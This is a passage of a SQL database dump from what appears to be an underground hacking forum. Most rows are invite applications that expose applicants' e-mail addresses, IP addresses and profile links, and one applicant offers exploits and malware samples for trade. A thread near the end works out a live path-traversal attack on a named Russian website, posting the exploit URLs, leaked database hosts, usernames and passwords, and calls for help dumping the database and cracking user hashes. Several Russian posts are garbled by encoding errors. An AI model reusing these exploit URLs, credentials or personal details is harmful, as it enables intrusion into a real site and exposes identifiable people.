[url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://cardingmafia.su/members/cazanova163.html | http://cardingmafia.su/members/cazanova163.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1818, 1599, 0, 'Invite', 2, '{$name}', 1409207204, '[SIZE=\'4\'][COLOR=\'Sienna\']Johnnyboyy[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: drnod@jabber.iitsp.com\n[b]e-mail[/b]: sniperfox@openmailbox.org\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 194.150.168.95\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.gaystarnews.com/users/johnnyboyy | http://www.gaystarnews.com/users/johnnyboyy \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1819, 1600, 0, 'Invite', 2, '{$name}', 1409210319, '[SIZE=\'4\'][COLOR=\'Sienna\']raas[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: rsp_emperor@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.59.75.21\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://raas.ru | raas.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1820, 1601, 0, 'Invite', 2, '{$name}', 1409229962, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@email.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: 158.255.211.156\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.8 (KHTML, like Gecko) Version/8.0 Safari/600.1.8\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/nicknameband | http://vk.com/nicknameband \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1821, 1602, 0, 'Invite', 2, '{$name}', 1409232838, '[SIZE=\'4\'][COLOR=\'Sienna\']dunfy[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: me@dandunford.info\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 82.70.152.6\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://dunfy.be | dunfy.be \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1822, 1603, 0, 'Invite', 2, '{$name}', 1409246651, '[SIZE=\'4\'][COLOR=\'Sienna\']sandgun_cypher[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: sandguncypher@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 117.243.217.129\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1823, 1604, 0, 'Invite', 2, '{$name}', 1409254700, '[SIZE=\'4\'][COLOR=\'Sienna\']subzerofrozeu[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: subzerofrozeu@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 96.38.41.202\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.steamid.co.uk/profile/76561198067316336 | http://www.steamid.co.uk/profile/76561198067316336 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1824, 1605, 0, 'Invite', 2, '{$name}', 1409262943, '[SIZE=\'4\'][COLOR=\'Sienna\']checkermint[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\n[b]e-mail[/b]: checkermint@hellokitty.com\n[b]Info[/b]: I am a pen tester with some vulnerabilities to trade or sell. Some of them are good - file path traversal, file upload, etc. I reverse-engineer malware at my job so I know a lot of VXing stuff. I have some malware samples to trade or just give away. I applied earlier when it was free to join, I talked to syslink about malware. I don\'t mind paying now if I have to.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.142.161.63\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/.../6228829506/ | https://www.flickr.com/photos/.../6228829506/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1825, 1606, 0, 'Invite', 2, '{$name}', 1409266599, '[SIZE=\'4\'][COLOR=\'Sienna\']checkermint[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\n[b]e-mail[/b]: checkermint@hellokitty.com\n[b]Info[/b]: Last invite failed. I have to fill this in again I guess. I\'m a pen tester with some good shit to sell or trade. Specialize in finding file path exploits. I want to keep collecting malware samples and talk to people writing them. I have some sampels from the work I\'ve done.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 194.150.168.95\n[*][b]real ip[/b]: 178.20.55.16\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/.../6228829506/ | https://www.flickr.com/photos/.../6228829506/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1826, 1607, 0, 'Invite', 2, '{$name}', 1409269650, '[SIZE=\'4\'][COLOR=\'Sienna\']checkermint[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\n[b]e-mail[/b]: checkermint@hellokitty.com\n[b]Info[/b]: I keep having to fill this out because of my browser settings. I have a lot of bugs to trade, most of them things like file path traversal on web hosts. I also want to trade malware samples and give some away. I take malware apart at my job. I talked to syslink about malware already and I wanted to join here for free.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 162.252.242.197\n[*][b]real ip[/b]: 162.252.242.197\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/.../6228829506/ | https://www.flickr.com/photos/.../6228829506/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1827, 1608, 0, 'Invite', 2, '{$name}', 1409279492, '[SIZE=\'4\'][COLOR=\'Sienna\']nicotine[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: f0f020002000@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 188.52.112.145\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/art_nicotine | http://vk.com/art_nicotine \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1828, 1609, 0, 'Invite', 2, '{$name}', 1409344961, '[SIZE=\'4\'][COLOR=\'Sienna\']w0rst[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Schiz0id@jabber.ru\n[b]e-mail[/b]: 1337g33k@jupimail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.104.224.42\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://w0rst-hardware.blogspot.com/ | http://w0rst-hardware.blogspot.com/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1829, 1610, 0, 'Invite', 2, '{$name}', 1409359490, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: lansanxing@163.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 110.17.251.192\n[*][b]real ip[/b]: 110.17.251.192\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1830, 1611, 0, 'Invite', 2, '{$name}', 1409386404, '[SIZE=\'4\'][COLOR=\'Sienna\']Freaktechz[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: freaktechz@exploit.im\n[b]e-mail[/b]: freaktechz@yandex.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 101.222.248.204\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://freaktechz.blogspot.com | freaktechz.blogspot.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1831, 1083, 1119, 'Psych0tr1a', 11, '', 1409393547, 'ýðшûðÑÂÑŒ ÑÂúуûѠð ñþûьшþù üøшúð ýõ þтòõчðõт ýøóôõ( úþüу ÑÂтучðть úрþüõ ýõóþ ?', 1, 0, '', 0, 1, 0, 0, 0),
(1832, 1083, 1119, 'w0rm', 1, '', 1409396083, 'öôõü ýõôõûьúу, ÿþтþü ýðчøýðõü руóðтьÑÂÑÂ...', 1, 0, '', 0, 1, 0, 0, 0),
(1833, 1612, 0, 'unlog', 45, 'overpro.ru | Generic File Downloader', 1409398034, '[CODE]\r\nhttp://overpro.ru/upload/download.php?file=\r\nÛøÑÂтøýó фðùûþò ò ÿðÿúõ: http://overpro.ru/upload/download.php?file=../.\r\n[/CODE]\r\n\r\n[LIST]\r\n[*]ÃÂтþ ýõ LFI.\r\n[*]Óру÷øть ðÿûþðôõрþü php/shtml/htaccess фðùûы üþöýþ ôðöõ ýõ ÿытðтьÑÂÑ (ÿðÿúõ òыÑÂтðòûõýы ÿрðòð ò úþýфøóõ ÑÂõрòõрð).\r\n[*]Üþöýþ ÑÂúðчðть ûюñþù фðùû Ñ ÑÂõрòõрð (úрþüõ þчõýь ñþûьшøх).\r\n[*]Üþöýþ ÿþûучðть ûøÑÂтøýó фðùûþò ò ôøрõúтþрøø (ò òøôõ ÑÂтрðýýþóþ ñøýðрýþóþ фðùûð).\r\n[/LIST]\r\n\r\nÞôýþ òрõüѠÿытðÃȄÂѠрðÑÂúрутøть ýð чтþ-тþ ñþûьшõõ, þôýðúþ ýøчõóþ тþûúþòþóþ ÿрøôуüðть ýõ ÿþûучøûþÑÂÑŒ.\r\n\r\nÕÑÂûø у úþóþ-тþ õÑÂть öõûðýøõ ýðÿøÑÂðть ÑÂúрøÿт ø òыúðчðть òÑÂõ ÑÂúрøÿты Ñ ÑÂõрòõрð ôûѠôðûьýõùшõóþ ðýðûø÷ð ñыûþ ñы úрутþ.', 1, 0, '', 0, 1, 0, 0, 0),
(1834, 1083, 1119, 'kx00', 6, '', 1409412305, 'ÑÂúуûю ýðшõû. ñð÷у ÑÂûøòðù. ты ÿþ úðúþüу ôþüõýу ýðшõû ôырúу?', 1, 1, '', 0, 1, 0, 0, 0),
(1835, 1612, 1833, 'Psych0tr1a', 11, '', 1409415189, 'ð ÑÂüыÑÂû òыúðчøòðь òÑÂõ ÑÂрð÷у?\n\nûð÷õù ÿþ ÑÂðüþüу ÑÂðùту ÑÂüþтрø фуýúцøþýðû ÑÂтрðýøцø þтúрыòðù ÿþтþü тõ фðùûы чтþ тõñõ ýуöýы.', 1, 0, '', 0, 1, 0, 0, 0),
(1836, 1612, 1833, 'unlog', 45, '', 1409415919, 'тðúøü ÑÂÿþÑÂþñþü ýøчõóþ хþрþшõóþ ýðùôõýþ ýõ ñыûþ (õÑÂть ÿøÑÂðûúø ò ýõøÑÂÿþûýÑÂõüыõ фðùûы, phpinfo óôõ-тþ, üýþóþ òÑÂõóþ ÿþ üõûþчø).\n\nØüõѠôðüÿ ÑÂúрøÿтþò üþöýþ ÑÂôõûðть ÿþøÑÂú ýð ÿþтõýцøðûьýþ ю÷ðñõûьýыõ фуýúцøø, ø þттðûúøòðÑÂÑÂÑŒ þт ÑÂтþóþ ÑÂüþтрõть, üþöýþ ûø ÿрþтðûúýуть ò ýøх öõûðõüþõ ÷ýðчõýøõ.', 1, 0, '', 0, 1, 0, 0, 0),
(1837, 1612, 1833, 'ropertus', 33, '', 1409419936, 'Here is some useful stuff I have found ))\n\n_http://overpro.ru/upload/download.php?file=/../../../../../../../../../../../../../../../../home/overpro/test/configuration.php\n\n$mosConfig_host = \'88.208.57.184\';\n$mosConfig_user = \'sitesql777\';\n$mosConfig_db = \'wwwoverproru\';\n$mosConfig_password = \'4o2thqkhgBnKgx7\';\n$mosConfig_secret = \'tJQKCLTrjZIiuK0S\';\n\nIs anyone able to connect and dump the database?\n\nI also found partial database dump here:\n\n_http://overpro.ru/upload/download.php?file=forum.sql\n\nIt has some user hashes, maybe someone can crack these?', 1, 1, '', 0, 1, 0, 0, 0),
(1838, 1612, 1837, 'unlog', 45, '', 1409421080, '[QUOTE=ropertus;1837]Here is some useful stuff I have found ))\n\n...\n\nI also found partial database dump here:\n\n_http://overpro.ru/upload/download.php?file=forum.sql\n\nIt has some user hashes, maybe someone can crack these?[/QUOTE]\nThanks:)\n\nbut forum.sql is not from our target, most likely its from cs-expert.ru\n\n_http://www.overpro.ru/i.php - phpinfo();\n\nmore mysql credentials at\n_http://overpro.ru/upload/download.php?file=/../../../../../../../../home/zeta/zeta.php\n\n[CODE]$mysqli = new mysqli(\'db.0ver.pro\',\'zeta\',\'zetaanticheat\',\'zeta\');[/CODE]\nalso some $_REQUEST array members are not filtered against SQL injection (but I think there should be easier way of getting shell or db dump)\n\n[B]Does anybody have any ideas about format of directory listing file?[/B]', 1, 0, '', 0, 1, 0, 0, 0),
(1839, 1613, 0, 'Invite', 2, '{$name}', 1409425900, '[SIZE=\'4\'][COLOR=\'Sienna\']checkermint[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\n[b]e-mail[/b]: checkermint@hellokitty.com\n[b]Info[/b]: Still trying to get this form to work. I am a pen tester with some bugs to sell, mostly file path traversal and some shell uploads. I take apart malware at my job. I like trading malware and finding rare samples, I have some to trade or give away.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.63.97.34\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/.../6228829506/ | https://www.flickr.com/photos/.../6228829506/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
